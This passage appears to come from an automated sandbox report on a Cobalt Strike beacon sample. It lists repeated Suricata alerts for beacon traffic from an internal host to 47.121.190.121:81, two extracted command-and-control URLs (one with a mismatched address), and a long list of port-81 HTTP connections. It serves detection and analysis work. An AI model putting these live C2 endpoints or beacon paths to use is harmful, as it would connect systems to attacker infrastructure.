            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50167 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50182 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50116 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50184 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50174 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50206 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50117 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50177 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50111 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50179 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50170 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50122 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50140 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50188 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50163 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50186 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50169 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50198 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50165 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50196 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50209 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50176 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50158 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50151 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50197 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50178 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50204 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50200 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50195 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50145 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50205 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50123 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50192 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50096 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50147 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50126 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50130 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50148 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50133 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50153 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50180 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50207 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50157 -> 47.121.190.121:81
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: http://7.121.190.121:81/r9dN
            Source: Malware configuration extractorURLs: http://47.121.190.121/r9dN
            Uses known network protocols on non-standard ports
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49732
            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49733
            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49734
            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49735
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49738
            Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49739
            Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49740
            Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49741
            Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49742
            Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49743
            Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49746
            Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49749
            Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49751
            Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49753
            Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49754
            Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49755
            Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49756
            Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49757
            Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49758
            Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49759
            Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49760
            Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49761
            Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49762
            Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49763
            Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49764
            Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49765
            Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49766
            Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49767
            Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49768
            Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49769
            Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49770
            Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49771
            Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49772
            Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49773
            Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49774
            Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49775
            Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49776
            Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49777
            Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49778
            Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49779
            Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49780
            Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49781
            Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49782
            Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49783
            Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49785
            Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49786
            Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49787
            Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49789
            Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49795
            Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49801
            Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49807
            Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49818
            Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49824
            Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49830
            Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49837
            Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49841
            Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49849
            Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49856
            Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49863
            Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49873
            Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49879
            Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49886
            Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49893
            Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49902
            Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49909
            Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49916
            Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49926
            Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49932
            Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49939
            Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49948
            Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49955
            Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49963
            Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49971
            Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49978
            Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49988
            Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49996
            Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50005
            Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50012
            Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50020
            Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50028
            Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50035
            Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50042
            Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50051
            Source: unknownNetwork traffic detected: HTTP traffic on port 50060 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50060
            Source: unknownNetwork traffic detected: HTTP traffic on port 50068 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50068
            Source: unknownNetwork traffic detected: HTTP traffic on port 50076 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50076
            Source: unknownNetwork traffic detected: HTTP traffic on port 50083 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50083
            Source: unknownNetwork traffic detected: HTTP traffic on port 50093 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50093
            Source: unknownNetwork traffic detected: HTTP traffic on port 50094 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50094
            Source: unknownNetwork traffic detected: HTTP traffic on port 50095 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50095
            Source: unknownNetwork traffic detected: HTTP traffic on port 50096 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50096
            Source: unknownNetwork traffic detected: HTTP traffic on port 50097 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50097
            Source: unknownNetwork traffic detected: HTTP traffic on port 50098 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50098
            Source: unknownNetwork traffic detected: HTTP traffic on port 50099 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50099
            Source: unknownNetwork traffic detected: HTTP traffic on port 50100 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50100
            Source: unknownNetwork traffic detected: HTTP traffic on port 50101 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 50102 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50102
            Source: unknownNetwork traffic detected: HTTP traffic on port 50103 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50103
            Source: unknownNetwork traffic detected: HTTP traffic on port 50104 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50104
            Source: unknownNetwork traffic detected: HTTP traffic on port 50105 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50105
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50105
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50105
            Source: unknownNetwork traffic detected: HTTP traffic on port 50106 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50106
            Source: unknownNetwork traffic detected: HTTP traffic on port 50107 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50107
            Source: unknownNetwork traffic detected: HTTP traffic on port 50108 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50108
            Source: unknownNetwork traffic detected: HTTP traffic on port 50109 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50109
            Source: unknownNetwork traffic detected: HTTP traffic on port 50110 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50110
            Source: unknownNetwork traffic detected: HTTP traffic on port 50111 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50111
            Source: unknownNetwork traffic detected: HTTP traffic on port 50112 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50112
            Source: unknownNetwork traffic detected: HTTP traffic on port 50113 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50113
            Source: unknownNetwork traffic detected: HTTP traffic on port 50114 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 50115 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50115
            Source: unknownNetwork traffic detected: HTTP traffic on port 50116 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50116
            Source: unknownNetwork traffic detected: HTTP traffic on port 50117 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50117
            Source: unknownNetwork traffic detected: HTTP traffic on port 50118 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50118
            Source: unknownNetwork traffic detected: HTTP traffic on port 50119 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50119
            Source: unknownNetwork traffic detected: HTTP traffic on port 50120 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50120
            Source: unknownNetwork traffic detected: HTTP traffic on port 50121 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50121
            Source: unknownNetwork traffic detected: HTTP traffic on port 50122 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50122
            Source: unknownNetwork traffic detected: HTTP traffic on port 50123 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50123
            Source: unknownNetwork traffic detected: HTTP traffic on port 50124 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50124
            Source: unknownNetwork traffic detected: HTTP traffic on port 50125 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50125
            Source: unknownNetwork traffic detected: HTTP traffic on port 50126 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50126
            Source: unknownNetwork traffic detected: HTTP traffic on port 50127 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50127
            Source: unknownNetwork traffic detected: HTTP traffic on port 50128 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50128
            Source: unknownNetwork traffic detected: HTTP traffic on port 50129 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50129
            Source: unknownNetwork traffic detected: HTTP traffic on port 50130 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50130
            Source: unknownNetwork traffic detected: HTTP traffic on port 50131 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50131
            Source: unknownNetwork traffic detected: HTTP traffic on port 50132 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50132
            Source: unknownNetwork traffic detected: HTTP traffic on port 50133 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50133
            Source: unknownNetwork traffic detected: HTTP traffic on port 50134 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50134
            Source: unknownNetwork traffic detected: HTTP traffic on port 50135 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50135
            Source: unknownNetwork traffic detected: HTTP traffic on port 50136 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50136
            Source: unknownNetwork traffic detected: HTTP traffic on port 50137 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50137
            Source: unknownNetwork traffic detected: HTTP traffic on port 50138 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50138
            Source: unknownNetwork traffic detected: HTTP traffic on port 50139 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50139
            Source: unknownNetwork traffic detected: HTTP traffic on port 50140 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50140
            Source: unknownNetwork traffic detected: HTTP traffic on port 50141 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50141
            Source: unknownNetwork traffic detected: HTTP traffic on port 50142 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50142
            Source: unknownNetwork traffic detected: HTTP traffic on port 50143 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50143
            Source: unknownNetwork traffic detected: HTTP traffic on port 50144 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50144
            Source: unknownNetwork traffic detected: HTTP traffic on port 50145 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50145
            Source: unknownNetwork traffic detected: HTTP traffic on port 50146 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50146
            Source: unknownNetwork traffic detected: HTTP traffic on port 50147 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50147
            Source: unknownNetwork traffic detected: HTTP traffic on port 50148 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50148
            Source: unknownNetwork traffic detected: HTTP traffic on port 50149 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50149
            Source: unknownNetwork traffic detected: HTTP traffic on port 50150 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50150
            Source: unknownNetwork traffic detected: HTTP traffic on port 50151 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50151
            Source: unknownNetwork traffic detected: HTTP traffic on port 50152 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50152
            Source: unknownNetwork traffic detected: HTTP traffic on port 50153 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50153
            Source: unknownNetwork traffic detected: HTTP traffic on port 50154 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50154
            Source: unknownNetwork traffic detected: HTTP traffic on port 50155 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50155
            Source: unknownNetwork traffic detected: HTTP traffic on port 50156 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50156
            Source: unknownNetwork traffic detected: HTTP traffic on port 50157 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50157
            Source: unknownNetwork traffic detected: HTTP traffic on port 50158 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50158
            Source: unknownNetwork traffic detected: HTTP traffic on port 50159 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50159
            Source: unknownNetwork traffic detected: HTTP traffic on port 50160 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50160
            Source: unknownNetwork traffic detected: HTTP traffic on port 50161 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50161
            Source: unknownNetwork traffic detected: HTTP traffic on port 50162 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50162
            Source: unknownNetwork traffic detected: HTTP traffic on port 50163 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50163
            Source: unknownNetwork traffic detected: HTTP traffic on port 50164 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50164
            Source: unknownNetwork traffic detected: HTTP traffic on port 50165 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50165
            Source: unknownNetwork traffic detected: HTTP traffic on port 50166 -> 81
